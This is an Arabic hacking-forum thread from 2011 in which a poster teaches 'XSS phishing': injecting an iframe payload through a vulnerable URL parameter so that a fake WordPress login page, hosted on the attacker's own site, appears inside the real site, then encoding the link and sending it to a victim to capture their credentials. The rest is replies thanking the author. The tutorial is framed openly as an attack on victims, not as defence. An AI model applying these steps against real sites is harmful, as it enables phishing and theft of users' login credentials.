:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   جديد استخدامات xss وهي الـ phishing login (http://www.vbspiders.com/vb/t58378.html)

JetLi 09-10-2011 03:33 PM

جديد استخدامات xss وهي الـ phishing login
 
السلام عليكم
هذا استخدام غير معروف لثغرة xss:2:
تعبت في عمل الفيديو والشرح راجاء اعمل تقييم ويمنتنع رودوم من نوع شكراً
الفكرة تعتمد على الدمج بين الصفحات المزورة واترككم مع الفيديو خخخخخخخ
حمل الفيديو من هنا

تحميييييل


~~~~~~~~~~~~~~~~~~~~

~

بسم الله الرحمن الرحيم
السلام عليكم

معكم IronMan من
شبكة العناكب الاحترافية

درسنا اليوم هو عن استغلال شبه غير معروف عن ثغرة XSS وهو XSS phishing
اي الخداع عن طريق هذه الثغرة، طبعا الكل يعرف سرقة الكوكيز ولكن لماذا
لان نستخدم هذه الثغرة في حقن اكواد HTML في الصفحة؟
سنرى الطريقة تابعوا معي

هذا كود بسيط نصبته في local server وصنعت ثغرة xss بسيطة المتغير المصاب هو x قبل ما نحقنه نشوف عدة خطوات وهي انك ترفع صفحة مزورة على موقع ثاني لنقل

httP://mysite.com/phishing.php

لازم تكون من نفس لوحة التحكم للسكربت الحابي تخترقه يعني مثال ويرد برس

نأتي الان لخطوة الحقن وهي استخدام هذا الكود

<****** frameborder=0 src=http://www.yoursite.com/wp-login.php? height=700px width=1250px ></******>

لاحظ رابط الصفحة المزورة يجب ان تتأكد منه وتعدل ه بما يناسبك

لازم تظبط ابعاد الصفحة قبل ما ترسلها يعني صفحة ملغمة
لا تنسى انه كود form action يرسل البيانات لك او يحفظها تقريبا شبيه بخطوات حفظ الكوكيز ، المهم
عندما نحقن الكود اعلاه في الصفحة ستظهر لوحة التحكم ويمكنك ارسالها للمستهدف ، بعد ما تشفر الكود الاخير بأي اداة من ادوات hackbar
تلك لاضافة في الفاير فوكس
ابحث عنها في قوقل ولا تكون كسلان


وليصبح الرابط في النهاية

http://localhost/mblue_u/test.php?x=...E%3C/******%3E

وبكذا ترسلوا الرابط للضحية
او تتفننوا علي كيفيكم مثل ما تسرقون الكوكيز يمكنك ان تصنع صفحة مزورة بهذه الطريقة ول ايشك ابدا حتى لو نظر للعنوان سيجد انه في الموقع
وبكذا انتهى



الدرس
اخوكم / ايرون مان هكر
شبكة العناكب الاحترافية
vbspiders.com/vb/



bleu moon 09-10-2011 06:52 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
هههه عملت الفيديوا اذن ...
بارك الله فيك ...
لي عوده ...

bleu moon 09-10-2011 07:02 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
ينقل الى مرجع تغرات xss

http://www.vbspiders.com/vb/t58067-p...tml#post388177

agentsimo 09-10-2011 07:03 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
thxxxx

JetLi 09-10-2011 07:09 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
لكن كذا دفنت الموضوع كان تتركه اسبوع

bleu moon 09-10-2011 07:13 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
هيك احسن هههه

JetLi 09-11-2011 07:58 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
نو نو ما احسن ولا شيء هذا يعتبر دمج ما بين قسم البريد واختراق المواقع ههههه

hiplorenzo 10-13-2011 03:04 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
nice merci bcp

msbhacker 10-16-2011 02:41 AM

رد: جديد استخدkمات xss وهي الـ phishing login
 
thanks u very much

samourai_7 10-18-2011 12:10 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
شـكــ وبارك الله فيك ـــرا لك

يحيى زكريا 10-24-2011 01:21 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
موضوع اكثر من رائع

RyaX 11-14-2011 02:00 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
ماد لو حطية باتش بدل الصفح

دام علاء العماد 11-14-2011 10:31 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
بارك الله فيك يا أخي الكريم على هذا الدرس القيم و جزاك الله عنا خير الجزاء

bigotoo 12-05-2011 06:20 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
مشكـــــور تسلم ثغرة حلوة

dal3_3ny 12-07-2011 07:53 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
thanxxxxxxxxxxxxxxxxxx

kodex007 12-14-2011 09:19 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
يعطيكـُ العآفيهـُ... [وآًصل]

DzHaCkEr_TeAm 12-17-2011 01:11 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
بارك الله فيك يا أخي الكريم على هذا الدرس القيم و جزاك الله عنا خير الجزاء

mond 12-17-2011 03:13 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
مشكورررررررررررررررررررررر

mr.grenady187 07-25-2013 04:33 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
يعطيك العآآآآآفية

صفصف . . . ! 07-31-2013 05:07 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
يعطيييييك ألف عافيه خيؤؤ

carlos_red 03-02-2014 08:21 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
بارك الله فيك أخي

essalhi 06-21-2014 09:17 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
gooooooooooooood

bndib1 08-02-2014 09:01 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
بارك الله فيك اخي الكريم

ProgrammerPlanet 09-04-2014 02:25 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
شكررررررررررررررررررررا

خالد سعودي 10-14-2014 02:37 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
بارك الله فيك ...

xyassin-hackerx 11-28-2014 04:59 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
goood
THX:5::5::5::5:

SPiDeR OF Mr 11-28-2014 05:42 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
شكرااااااااا لك اخي

ADEL AL7RBI 12-18-2014 07:39 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
مشكوووووو

zikooow 02-04-2015 03:25 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
مشكوررر


الساعة الآن 08:21 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0